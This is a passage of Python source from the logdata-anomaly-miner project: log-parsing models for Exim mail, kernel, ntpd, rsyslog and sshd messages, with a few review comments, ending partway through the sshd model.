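                    DelimitedDataModelElement("mail_to", b">"),
                    FixedDataModelElement("s3", b">" + host_str),
                    host,
                    FixedDataModelElement("s4", b" ["),
                    host_ip,
                    FixedDataModelElement("status_code", b"]" + status_code452),
                    DelimitedDataModelElement("mail_to", b">"),
                    FixedDataModelElement("msg", b"> Domain size limit exceeded")
                ]),
                SequenceModelElement("verification_error", [
                    msg_id,
                    FixedDataModelElement("s0", b" ** "),
                    DelimitedDataModelElement("mail_to", b" "),
                    FixedDataModelElement("s1", r_str),
                    r,
                    FixedDataModelElement("s2", t_str),
                    DelimitedDataModelElement("t", b":"),
                    FirstMatchModelElement("fm", [
                        SequenceModelElement("verification_failed", [
                            FixedDataModelElement("msg", b": SMTP error from remote mail server after RCPT TO:<"),
                            DelimitedDataModelElement("mail_to", b">"),
                            FixedDataModelElement("s3", b">" + host_str),
                            host,
                            FixedDataModelElement("s4", b" ["),
                            host_ip,
                            FixedDataModelElement("status_code", b"]" + status_code550),
                            FixedDataModelElement("msg", b"-Verification for <"),
                            DelimitedDataModelElement("mail_from", b">"),
                            FixedDataModelElement("msg", b">\\n550-The mail server could not deliver mail to "),
                            DelimitedDataModelElement("mail_to", b" "),
                            FixedDataModelElement("msg", b" The account or domain may not exist, they may be blacklisted, or missing the"
                                                         b" proper dns entries.\\n550 Sender verify failed")
                        ]),
                        SequenceModelElement("unable_to_verify", [
                            FixedDataModelElement("msg", b": SMTP error from remote mail server after MAIL FROM:<"),
                            DelimitedDataModelElement("mail_from", b">"),
                            FixedDataModelElement("s3", b">" + size_str),
                            size,
                            FixedDataModelElement("s4", host_str),
                            host,
                            FixedDataModelElement("s5", b" ["),
                            host_ip,
                            FixedDataModelElement("status_code", b"]" + status_code553 + b"<"),
                            DelimitedDataModelElement("mail_to", b">"),
                            # NOTE(review): "SMPT" is kept as written; presumably it mirrors the remote server's text - confirm against the dataset.
                            FixedDataModelElement("msg", b"> unable to verify address\\nVerify that SMPT authentication has been enabled.")
                        ])
                    ])
                ]),
                SequenceModelElement("mail_delivery_failure", [
                    msg_id,
                    FixedDataModelElement("s0", b" <= <>" + r_str),
                    r,
                    FixedDataModelElement("s1", u_str),
                    u,
                    FixedDataModelElement("s2", p_str),
                    p,
                    FixedDataModelElement("s3", s_str),
                    s,
                    FixedDataModelElement("s4", t_str),
                    FixedDataModelElement("t", b"\"Mail delivery failed: returning message to sender\""),
                    FixedDataModelElement("s5", b" for "),
                    VariableByteDataModelElement("mail_from", alphabet)
                ]),
                SequenceModelElement("mail_flagged_as_spam1", [
                    msg_id,
                    FixedDataModelElement("s0", h_str),
                    h,
                    FixedDataModelElement("s1", b" ["),
                    host_ip,
                    FixedDataModelElement("s2", b"]:"),
                    port,
                    FixedDataModelElement("msg", b" Warning: \"SpamAssassin as marka22 detected message as spam ("),
                    DelimitedDataModelElement("version", b")"),
                    FixedDataModelElement("s3", b")\"")
                ]),
                SequenceModelElement("mail_flagged_as_spam2", [
                    msg_id,
                    FixedDataModelElement("s0", b" <="),
                    host_ip,
                    FixedDataModelElement("s1", h_str),
                    DelimitedDataModelElement("h", b"["),
                    FixedDataModelElement("s2", b"["),
                    host_ip,
                    FixedDataModelElement("s3", b"]:"),
                    port,
                    FixedDataModelElement("s4", p_str),
                    p,
                    FixedDataModelElement("s5", s_str),
                    s,
                    FixedDataModelElement("s6", id_str),
                    msg_id,
                    FixedDataModelElement("s7", t_str),
                    AnyByteDataModelElement("msg")
                ]),
                SequenceModelElement("mail_flagged_as_spam3", [
                    msg_id,
                    FixedDataModelElement("s0", b" => "),
                    DelimitedDataModelElement("user", b" "),
                    DelimitedDataModelElement("s1", b"<", consume_delimiter=True),
                    mail_from,
                    FixedDataModelElement("s2", b" [>" + r_str),
                    r,
                    FixedDataModelElement("s3", t_str),
                    AnyByteDataModelElement("t")
                ]),
                SequenceModelElement("mail_flagged_as_spam4", [
                    msg_id,
                    FixedDataModelElement("msg", b" Completed"),
                    OptionalMatchModelElement("opt", SequenceModelElement("seq", [
                        FixedDataModelElement("s0", b" "),
                        dtme,
                        FixedDataModelElement("s1", b" "),
                        msg_id,
                        FixedDataModelElement("s2", h_str),
                        h,
                        FixedDataModelElement("s3", b" ["),
                        host_ip,
                        FixedDataModelElement("s4", b"]:"),
                        port,
                        FixedDataModelElement("msg", b" Warning: \"SpamAssassin as marka22 detected message as spam ("),
                        DelimitedDataModelElement("version", b")"),
                        FixedDataModelElement("s5", b")\"")
                    ]))
                ]),
                SequenceModelElement("mail_flagged_as_spam5", [
                    msg_id,
                    FixedDataModelElement("s0", b" <= "),
                    mail_from,
                    FixedDataModelElement("s1", h_str),
                    h,
                    FixedDataModelElement("s2", b" ["),
                    host_ip,
                    FixedDataModelElement("s3", b"]:"),
                    port,
                    FixedDataModelElement("s4", p_str),
                    p,
                    FixedDataModelElement("s5", s_str),
                    s,
                    FixedDataModelElement("s6", id_str),
                    msg_id,
                    FixedDataModelElement("s7", t_str + b'"'),
                    DelimitedDataModelElement("t", b"\""),
                    FixedDataModelElement("s8", b'" for '),
                    mail_from,
                    FixedDataModelElement("s9", b" "),
                    dtme,
                    FixedDataModelElement("s10", b" "),
                    msg_id,
                    FixedDataModelElement("s11", b" => "),
                    DelimitedDataModelElement("user", b" "),
                    FixedDataModelElement("s12", b" <"),
                    mail_from,
                    FixedDataModelElement("s13", b" [>" + r_str),
                    r,
                    FixedDataModelElement("s14", t_str),
                    AnyByteDataModelElement("t")
                ]),
                SequenceModelElement("mail_spam_allowed1", [
                    msg_id,
                    FixedDataModelElement("s0", h_str),
                    DelimitedDataModelElement("h", b"["),
                    FixedDataModelElement("s1", b"["),
                    host_ip,
                    FixedDataModelElement("s2", b"]:"),
                    port,
                    FirstMatchModelElement("fm", [
                        FixedDataModelElement("msg", b" Warning: Message has been scanned: no virus or other harmful content was found"),
                        SequenceModelElement("seq", [
                            FixedDataModelElement(
                                "msg", b" Warning: \"SpamAssassin as cpaneleximscanner detected OUTGOING smtp message as NOT spam ("),
                            DecimalFloatValueModelElement("spam_value", value_sign_type=DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL),
                            FixedDataModelElement("s3", b")\"")
                        ])
                    ])
                ]),
                SequenceModelElement("mail_spam_allowed2", [
                    msg_id,
                    FixedDataModelElement("s0", b" <= "),
                    mail_from,
                    FixedDataModelElement("s1", h_str),
                    h,
                    FixedDataModelElement("s2", b" ["),
                    host_ip,
                    FixedDataModelElement("s3", b"]:"),
                    port,
                    FixedDataModelElement("s4", p_str),
                    p,
                    FixedDataModelElement("s5", x_str),
                    x,
                    FixedDataModelElement("s6", a_str),
                    a,
                    FixedDataModelElement("s7", s_str),
                    s,
                    FixedDataModelElement("s8", t_str),
                    t,
                    FixedDataModelElement("msg", b" plates\" for "),
                    AnyByteDataModelElement("mail_to")
                ]),
                SequenceModelElement("mail_spam_allowed3", [
                    msg_id,
                    FixedDataModelElement("msg", b" SMTP connection outbound "),
                    DecimalIntegerValueModelElement("timestamp"),
                    FixedDataModelElement("s0", b" "),
                    msg_id,
                    FixedDataModelElement("s1", b" "),
                    DelimitedDataModelElement("domain", b" "),
                    FixedDataModelElement("s2", b" "),
                    AnyByteDataModelElement("mail_to")
                ]),
                SequenceModelElement("mail_spam_allowed4", [
                    msg_id,
                    FixedDataModelElement("s0", b" => "),
                    mail_from,
                    FixedDataModelElement("s1", r_str),
                    r,
                    FixedDataModelElement("s2", t_str),
                    t,
                    FixedDataModelElement("s3", h_str),
                    h,
                    FixedDataModelElement("s4", b" ["),
                    host_ip,
                    FixedDataModelElement("s5", b"]" + x_str),
                    x,
                    FixedDataModelElement("s6", c_str),
                    c,
                    FixedDataModelElement("s7", b"\" "),
                    dtme,
                    FixedDataModelElement("s8", b" "),
                    msg_id,
                    FixedDataModelElement("s9", b" Completed"),
                ]),
                # NOTE(review): the ids "mail_flagged_as_spam1" and "mail_flagged_as_spam2" are reused for the two branches
                # below; they are only tried after the branches above fail, and presumably their match paths collide - confirm.
                SequenceModelElement("mail_flagged_as_spam1", [
                    msg_id,
                    FixedDataModelElement("s0", h_str),
                    h,
                    FixedDataModelElement("s1", b" ["),
                    host_ip,
                    FixedDataModelElement("s2", b"]:"),
                    port,
                    FixedDataModelElement("msg", b" Warning: \"SpamAssassin as sfgthib detected message as spam ("),
                    DelimitedDataModelElement("version", b")"),
                    FixedDataModelElement("s3", b")\" "),
                    dtme,
                    FixedDataModelElement("s4", b" "),
                    msg_id,
                    FixedDataModelElement("s5", h_str),
                    h,
                    FixedDataModelElement("s6", b" ["),
                    host_ip,
                    FixedDataModelElement("s7", b"]:"),
                    port,
                    FixedDataModelElement("msg", b" Warning: Message has been scanned: no virus or other harmful content was found")
                ]),
                SequenceModelElement("mail_flagged_as_spam2", [
                    msg_id,
                    FixedDataModelElement("s0", b" <= "),
                    mail_from,
                    FixedDataModelElement("s1", h_str),
                    h,
                    FixedDataModelElement("s2", b" ["),
                    host_ip,
                    FixedDataModelElement("s3", b"]:"),
                    port,
                    FixedDataModelElement("s4", p_str),
                    p,
                    FixedDataModelElement("s5", x_str),
                    x,
                    FixedDataModelElement("s6", s_str),
                    s,
                    FixedDataModelElement("s7", id_str),
                    msg_id,
                    FixedDataModelElement("s8", t_str),
                    t,
                    FixedDataModelElement("s9", b" for "),
                    AnyByteDataModelElement("mail_to")
                ]),
                # Generic "<id> <= ..." / "<id> => ..." arrival and delivery lines.
                SequenceModelElement("mail", [
                    msg_id,
                    FirstMatchModelElement("dir", [
                        SequenceModelElement("dir_in", [
                            FixedDataModelElement("in", b" <= "),
                            FirstMatchModelElement("fm", [
                                # Bounce/null sender "<>" followed by either "R=... U=..." or "H=host [ip]", then "P=... S=...".
                                SequenceModelElement("seq1", [
                                    FixedDataModelElement("brack", b"<>"),
                                    FirstMatchModelElement("fm", [
                                        SequenceModelElement("r", [
                                            FixedDataModelElement("r_str", r_str),
                                            r,
                                            FixedDataModelElement("u_str", u_str),
                                            u,
                                        ]),
                                        SequenceModelElement("h", [
                                            FixedDataModelElement("h_str", h_str),
                                            h,
                                            FixedDataModelElement("sp1", b" ["),
                                            ip,
                                            # was a second "sp1": the duplicate id made the two fixed elements indistinguishable.
                                            FixedDataModelElement("sp2", b"]"),
                                        ])
                                    ]),
                                    FixedDataModelElement("sp2", p_str),
                                    p,
                                    # The size field is introduced by " S=", as in "mail_delivery_failure" and "seq2" in this
                                    # function; this element previously repeated p_str (" P="), so the branch could not match
                                    # a line carrying "P=... S=...".
                                    FixedDataModelElement("sp3", s_str),
                                    s,
                                ]),
                                SequenceModelElement("seq2", [
                                    DelimitedDataModelElement("mail", b" "),
                                    FixedDataModelElement("user_str", u_str),
                                    DelimitedDataModelElement("user", b" "),
                                    FixedDataModelElement("p_str", p_str),
                                    p,
                                    FixedDataModelElement("s_str", s_str),
                                    s,
                                    OptionalMatchModelElement(
                                        "id", SequenceModelElement("id", [
                                            FixedDataModelElement("id_str", id_str),
                                            AnyByteDataModelElement("id")
                                        ])
                                    )
                                ])
                            ])
                        ]),
                        SequenceModelElement("dir_out", [
                            FixedDataModelElement("in", b" => "),
                            DelimitedDataModelElement("name", b" "),
                            FixedDataModelElement("sp1", b" "),
                            OptionalMatchModelElement(
                                "mail_opt", SequenceModelElement("mail", [
                                    FixedDataModelElement("brack1", b"("),
                                    DelimitedDataModelElement("brack_mail", b")"),
                                    FixedDataModelElement("brack2", b") "),
                                ])),
                            FixedDataModelElement("sp2", b"<"),
                            DelimitedDataModelElement("mail", b">"),
                            FixedDataModelElement("r_str", b">" + r_str),
                            r,
                            FixedDataModelElement("t_str", t_str),
                            VariableByteDataModelElement("t", alphabet),
                        ]),
                        SequenceModelElement("aster", [
                            FixedDataModelElement("aster", b" ** "),
                            DelimitedDataModelElement("command", b" "),
                            FixedDataModelElement("headers_str", b' Too many "Received" headers - suspected mail loop')]),
                        FixedDataModelElement("completed", b" Completed"),
                        FixedDataModelElement("frozen", b" Message is frozen"),
                        FixedDataModelElement("frozen", b" Frozen (delivery error message)")
                    ])
                ]),
            ])
        ]),
        SequenceModelElement("no_date_seq", [
            FixedDataModelElement("s0", b"TO:<"),
            DelimitedDataModelElement("to_mail", b">"),
            FixedDataModelElement("s1", b">" + host_str),
            host,
            FixedDataModelElement("s2", b" ["),
            host_ip,
            FixedDataModelElement("status_code", b"]" + status_code450),  # status code has to be 450 in this error message.
            DelimitedDataModelElement("version", b" "),
            FixedDataModelElement("msg", b" Client host rejected: cannot find your hostname, ["),
            host_ip,
            FixedDataModelElement("s3", b"] "),
            dtme,
            FixedDataModelElement("s4", b" "),
            msg_id,
            FixedDataModelElement("s5", b" ** "),
            DelimitedDataModelElement("to_mail", b">"),
            FixedDataModelElement("msg", b">: retry timeout exceeded")
        ]),
        SequenceModelElement("invalid_dns_record", [
            FixedDataModelElement("msg", b"SMTP error from remote mail server after RCPT TO:" + host_str),
            DelimitedDataModelElement("host", b"["),
            FixedDataModelElement("s0", b"["),
            host_ip,
            FixedDataModelElement("status_code", b"]" + status_code550),
            FixedDataModelElement("msg", b"-Sender has no A, AAAA, or MX DNS records. "),
            DelimitedDataModelElement("host", b"\\"),
            FixedDataModelElement("s1", b"\\n550 l "),
            DelimitedDataModelElement("host", b"\\"),
            FixedDataModelElement("msg", b"\\nVerify the zone file in "),
            DelimitedDataModelElement("file", b" "),
            FixedDataModelElement("msg", b" for the correct information. If it appear correct, you can run named-checkzone "
                                         b"domain.com domain.com.db to verify if named is able to load the zone.")
        ]),
        SequenceModelElement("mail_rejected", [
            FixedDataModelElement("msg", b"Diagnostic-Code: X-Postfix;" + host_str1),
            host,
            FixedDataModelElement("s0", b" ["),
            host_ip,
            FixedDataModelElement("status_code", b"] said" + status_code550 + b" "),
            DelimitedDataModelElement("version", b" "),
            FixedDataModelElement("msg", b" Message rejected due to content restrictions (in reply to end of DATA command)\\nWhen you see "
                                         b"an error such as 550 "),
            VariableByteDataModelElement("version", alphabet)
        ]),
        SequenceModelElement("mail_authentication_error", [
            FixedDataModelElement("msg", b"Final-Recipient: rfc822;"),
            DelimitedDataModelElement("mail_from", b"\\"),
            FixedDataModelElement("msg", b"\\nAction: failed\\nStatus: "),
            DelimitedDataModelElement("status", b"\\"),
            FixedDataModelElement("msg", b"\\nDiagnostic-Code: smtp;550-Please turn on SMTP Authentication in your mail client.\\n550-"),
            host,
            FixedDataModelElement("s0", b" ["),
            host_ip,
            FixedDataModelElement("s1", b"]:"),
            port,
            FixedDataModelElement("msg", b" is not permitted to relay 550 through this server without authentication.")
        ]),
        SequenceModelElement("bad_helo_record", [
            DelimitedDataModelElement("cipher_suite", b" "),
            FixedDataModelElement("msg", b" " + smtp_error_from_remote),
            DelimitedDataModelElement("mail_from", b">"),
            FixedDataModelElement("s0", b">" + size_str),
            size,
            FixedDataModelElement("s1", host_str),
            host,
            FixedDataModelElement("s2", b" ["),
            host_ip,
            # Some lines give an address range "[a.b.c.d..N]" instead of a single address.
            OptionalMatchModelElement("optional", SequenceModelElement("seq", [
                FixedDataModelElement("to", b".."),
                DecimalIntegerValueModelElement("upper_ip")
            ])),
            FixedDataModelElement("status_code", b"]" + status_code550),
            FixedDataModelElement("msg", b" \"REJECTED - Bad HELO - Host impersonating ["),
            DelimitedDataModelElement("original_host", b"]"),
            FixedDataModelElement("s3", b"]\"")
        ]),
        SequenceModelElement("domain_not_exists", [
            FixedDataModelElement("msg", smtp_error_from_remote),
            DelimitedDataModelElement("mail_from", b">"),
            FixedDataModelElement("s0", b">" + host_str),
            host,
            FixedDataModelElement("s1", b" ["),
            host_ip,
            FixedDataModelElement("status_code", b"]" + status_code553),
            FixedDataModelElement("msg", b"sorry, your domain does not exists.")
        ]),
        SequenceModelElement("rejected_due_to_spam_content", [
            DateTimeModelElement("time", b"[%H:%M:%S"),
            FixedDataModelElement("hosts", b" hosts"),
            DecimalIntegerValueModelElement("hosts_number"),
            FixedDataModelElement("s0", b" "),
            RepeatedElementDataModelElement("rep", FirstMatchModelElement("fm", [
                SequenceModelElement("seq", [
                    dtme,
                    FixedDataModelElement("s1", b" "),
                    msg_id,
                    FixedDataModelElement("s2", b" <= <>" + r_str),
                    r,
                    FixedDataModelElement("s3", u_str),
                    u,
                    FixedDataModelElement("s4", p_str),
                    p,
                    FixedDataModelElement("s5", s_str),
                    s,
                    FixedDataModelElement("s6", t_str + b'"'),
                    DelimitedDataModelElement("t", b'"'),
                    FixedDataModelElement("s7", b'" for '),
                    mail_from,
                    FixedDataModelElement("s8", b" "),
                    dtme,
                    FixedDataModelElement("s9", b" cwd="),
                    DelimitedDataModelElement("cwd", b" "),
                    FixedDataModelElement("s10", b" "),
                    DecimalIntegerValueModelElement("args_num"),
                    FixedDataModelElement("s11", b" args: "),
                    RepeatedElementDataModelElement("rep", FirstMatchModelElement("fm", [
                        SequenceModelElement("seq", [
                            dtme,
                            FixedDataModelElement("s12", b" "),
                            msg_id,
                            FixedDataModelElement("s13", b" ** "),
                            mail_from,
                            FixedDataModelElement("s14", r_str),
                            r,
                            FixedDataModelElement("s15", t_str),
                            DelimitedDataModelElement("t", b":"),
                            FixedDataModelElement("msg", b": SMTP error from remote mail server after end of data" + host_str),
                            DelimitedDataModelElement("domain", b" "),
                            FixedDataModelElement("s16", b" ["),
                            host_ip,
                            FixedDataModelElement("status_code", b"]" + status_code554),
                            FixedDataModelElement("msg", b"rejected due to spam content")
                        ]),
                        # this is problematic as the number of arguments is variable!
                        SequenceModelElement("arg_seq", [
                            DelimitedDataModelElement("arg", b" "),
                            FixedDataModelElement("s17", b" ")
                        ])
                    ]))
                ]),
                # this is problematic as the number of hosts is variable!
                SequenceModelElement("host_seq", [
                    host,
                    FixedDataModelElement("s8", b" ")
                ])
            ]))
        ]),
    ])
    return model
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/KernelMsgParsingModel.py000066400000000000000000000035541500476301700332500ustar00rootroot00000000000000
"""This module defines a parser for kernelmsg."""
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement


def get_model():
    """
    Return a model to parse messages from kernel logging.

    The model expects the "kernel: " prefix, an optional "[<timestamp>] " block, and then one of: an
    "IPv4: martian source/destination ..." line, an "ll header: ..." line, or anything else ("unparsed").
    @return the root SequenceModelElement named "kernel".
    """
    type_children = [
        SequenceModelElement("ipv4-martian", [
            FixedDataModelElement("s0", b"IPv4: martian "),
            FixedWordlistDataModelElement("direction", [b"source", b"destination"]),
            FixedDataModelElement("s1", b" "),
            IpAddressDataModelElement("destination"),
            FixedDataModelElement("s2", b" from "),
            IpAddressDataModelElement("source"),
            FixedDataModelElement("s3", b", on dev "),
            AnyByteDataModelElement("interface")]),
        SequenceModelElement("net-llheader", [
            FixedDataModelElement("s0", b"ll header: "),
            AnyByteDataModelElement("data")
        ]),
        # Catch-all so that every kernel line still produces a match.
        AnyByteDataModelElement("unparsed")
    ]
    model = SequenceModelElement("kernel", [
        FixedDataModelElement("sname", b"kernel: "),
        OptionalMatchModelElement("opt", SequenceModelElement("seq", [
            # The timestamp block is "[" ... "] ": the opener was previously written as b"]", so the optional
            # element could never match and timestamped lines fell through to the "unparsed" branch.
            FixedDataModelElement("opt_s0", b"["),
            DelimitedDataModelElement("timestamp", b"]"),
            FixedDataModelElement("opt_s1", b"] "),
        ])),
        FirstMatchModelElement("msg", type_children)
    ])
    return model
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/NtpParsingModel.py000066400000000000000000000121261500476301700321170ustar00rootroot00000000000000
"""This module defines the parsing model for ntpd logs."""
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement


def get_model():
    """
    Return a model to parse ntpd messages of the form "ntpd[<pid>]: <message>".

    @return the root SequenceModelElement named "ntpd"; the message part is a FirstMatchModelElement "msg" over
    the ntpd message types listed in type_children below.
    """
    interface_name_model = VariableByteDataModelElement("interface", b"0123456789abcdefghijklmnopqrstuvwxyz.")
    # Shared by the "expire=" and "last=" fields of the leapsecond-file message.
    dtme = DateTimeModelElement("expire-date", b"%Y-%m-%dT%H:%M:%SZ")
    type_children = [
        SequenceModelElement("exit", [
            FixedDataModelElement("s0", b"ntpd exiting on signal "),
            DecimalIntegerValueModelElement("signal")
        ]),
        SequenceModelElement("listen-drop", [
            FixedDataModelElement("s0", b"Listen and drop on "),
            DecimalIntegerValueModelElement("fd"),
            FixedDataModelElement("s1", b" "),
            interface_name_model,
            FixedDataModelElement("s2", b" "),
            FirstMatchModelElement("address", [
                IpAddressDataModelElement("ipv4"),
                DelimitedDataModelElement("ipv6", b" "),
                FixedDataModelElement("ipv6_missing", b"[::]")
            ]),
            # Older ntpd versions log " UDP 123", newer ones ":123".
            FirstMatchModelElement("udp", [
                FixedDataModelElement("s3", b" UDP 123"),
                FixedDataModelElement("s3", b":123")])
        ]),
        SequenceModelElement("listen-normal", [
            FixedDataModelElement("s0", b"Listen normally on "),
            DecimalIntegerValueModelElement("fd"),
            FixedDataModelElement("s1", b" "),
            interface_name_model,
            FixedDataModelElement("s2", b" "),
            IpAddressDataModelElement("ip"),
            FirstMatchModelElement("msg", [
                FixedDataModelElement("port-new", b":123"),
                FixedDataModelElement("port-old", b" UDP 123")
            ])
        ]),
        SequenceModelElement("listen-routing", [
            FixedDataModelElement("s0", b"Listening on routing socket on fd #"),
            DecimalIntegerValueModelElement("fd"),
            FixedDataModelElement("s1", b" for interface updates")
        ]),
        SequenceModelElement("soliciting-pool", [
            FixedDataModelElement("s0", b"Soliciting pool server "),
            IpAddressDataModelElement("pool-server-ip")
        ]),
        SequenceModelElement("starting", [
            FixedDataModelElement("s0", b"ntpd "),
            DelimitedDataModelElement("version", b" "),
            FixedDataModelElement("s1", b" (1): Starting")
        ]),
        SequenceModelElement("no-root", [
            FixedDataModelElement("s0", b"must be run as root, not uid "),
            DecimalIntegerValueModelElement("uid")
        ]),
        SequenceModelElement("leapsecond-file", [
            FixedDataModelElement("s0", b"leapsecond file ('"),
            DelimitedDataModelElement("file", b"'"),
            FixedDataModelElement("s1", b"'): "),
            FirstMatchModelElement("first", [
                FixedDataModelElement("msg", b"good hash signature"),
                SequenceModelElement("seq", [
                    FixedDataModelElement("s2", b"loaded, expire="),
                    dtme,
                    FixedDataModelElement("s3", b" last="),
                    dtme,
                    FixedDataModelElement("s4", b" ofs="),
                    DecimalIntegerValueModelElement("ofs")
                ])
            ])
        ]),
        FixedDataModelElement("unable-to-bind", b"unable to bind to wildcard address :: - another process may be running - EXITING"),
        FixedDataModelElement("new-interfaces", b"new interface(s) found: waking up resolver"),
        FixedDataModelElement("ntp-io", b"ntp_io: estimated max descriptors: 1024, initial socket boundary: 16"),
        FixedDataModelElement("peers-refreshed", b"peers refreshed"),
        FixedDataModelElement("log-file", b"logging to file /var/log/ntplog"),
        FixedDataModelElement("command-line", b"Command line: ntpd"),
        SequenceModelElement("precision", [
            FixedDataModelElement("s0", b"proto: precision = "),
            DecimalFloatValueModelElement("precision"),
            FixedDataModelElement("s1", b" usec ("),
            DecimalIntegerValueModelElement("usec", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL),
            FixedDataModelElement("s2", b")")
        ])]
    model = SequenceModelElement("ntpd", [
        FixedDataModelElement("sname", b"ntpd["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: "),
        FirstMatchModelElement("msg", type_children)
    ])
    return model
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/RsyslogParsingModel.py000066400000000000000000000075501500476301700330250ustar00rootroot00000000000000"""This module defines a parser for rsyslog.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse a su session information message after any standard logging preamble, e.g. 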
from syslog.""" type_children = [ SequenceModelElement("gidchange", [ FixedDataModelElement("s0", b"rsyslogd's groupid changed to "), DecimalIntegerValueModelElement("gid") ]), SequenceModelElement("statechange", [ FixedDataModelElement("s0", b'[origin software="rsyslogd" swVersion="'), DelimitedDataModelElement("version", b'"'), FixedDataModelElement("s1", b'" x-pid="'), DecimalIntegerValueModelElement("pid"), FirstMatchModelElement("fm", [ FixedDataModelElement("s2", b'" x-info="https://www.rsyslog.com"] '), FixedDataModelElement("s2", b'" x-info="http://www.rsyslog.com"] ') ]), FirstMatchModelElement("type", [ FixedDataModelElement("HUPed", b"rsyslogd was HUPed"), FixedDataModelElement("start", b"start") ]) ]), SequenceModelElement("uidchange", [ FixedDataModelElement("s0", b"rsyslogd's userid changed to "), DecimalIntegerValueModelElement("uid") ]), SequenceModelElement("action", [ FixedDataModelElement("s0", b"action '"), DelimitedDataModelElement("action", b"'"), FirstMatchModelElement("fm", [ SequenceModelElement("resumed", [ FixedDataModelElement("s1", b"' resumed (module '"), DelimitedDataModelElement("module", b"'"), FixedDataModelElement("s2", b"') [try http://www.rsyslog.com/e/"), DecimalIntegerValueModelElement("number"), FixedDataModelElement("s3", b" ]") ]), SequenceModelElement("suspended", [ FixedDataModelElement("s1", b"' suspended, next retry is "), DelimitedDataModelElement("dayname", b" "), FixedDataModelElement("s2", b" "), DateTimeModelElement("dtme", b"%b %d %H:%M:%S %Y"), FixedDataModelElement("s2", b" [try http://www.rsyslog.com/e/"), DecimalIntegerValueModelElement("number"), FixedDataModelElement("s3", b" ]") ]) ]), ]), SequenceModelElement("cmd", [ FixedDataModelElement("s0", b"command '"), DelimitedDataModelElement("command", b"'"), FixedDataModelElement( "s1", b"' is currently not permitted - did you already set it via a RainerScript command (v6+ config)? 
["), DelimitedDataModelElement("version", b"]", consume_delimiter=True) ]) ] model = SequenceModelElement("rsyslog", [ FixedDataModelElement("sname", b"rsyslogd"), OptionalMatchModelElement("opt", FirstMatchModelElement("fm", [ DecimalIntegerValueModelElement("number"), SequenceModelElement("seq", [ FixedDataModelElement("s0", b"-"), DecimalIntegerValueModelElement("number") ]) ])), FixedDataModelElement("s0", b": "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SshdParsingModel.py000066400000000000000000000434251500476301700322650ustar00rootroot00000000000000"""This module provides support for parsing of sshd messages.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement def get_model(user_name_model=None): """Return a model to parse a sshd information message after any standard logging preamble, e.g. 
from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-") from_str = b" from " port = b" port " preauth = b" [preauth]" type_children = [ SequenceModelElement("accepted key", [ FixedDataModelElement("s0", b"Accepted publickey for "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2: "), DelimitedDataModelElement("asym-algorithm", b" ", consume_delimiter=True), VariableByteDataModelElement("fingerprint", b"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/:"), OptionalMatchModelElement("opt", SequenceModelElement("seq", [ FixedDataModelElement("s4", b" ID "), DelimitedDataModelElement("id", b" "), FixedDataModelElement("s5", b" (serial "), DecimalIntegerValueModelElement("serial"), FixedDataModelElement("s6", b") CA "), AnyByteDataModelElement("algorithm_details") ])) ]), SequenceModelElement("btmp-perm", [ FixedDataModelElement("s0", b"Excess permission or bad ownership on file /var/log/btmp") ]), SequenceModelElement("close-sess", [ FixedDataModelElement("s0", b"Close session: user "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" id "), DecimalIntegerValueModelElement("userid") ]), SequenceModelElement("closing", [ FixedDataModelElement("s0", b"Closing connection to "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("closed", [ FixedDataModelElement("s0", b"Connection closed by "), 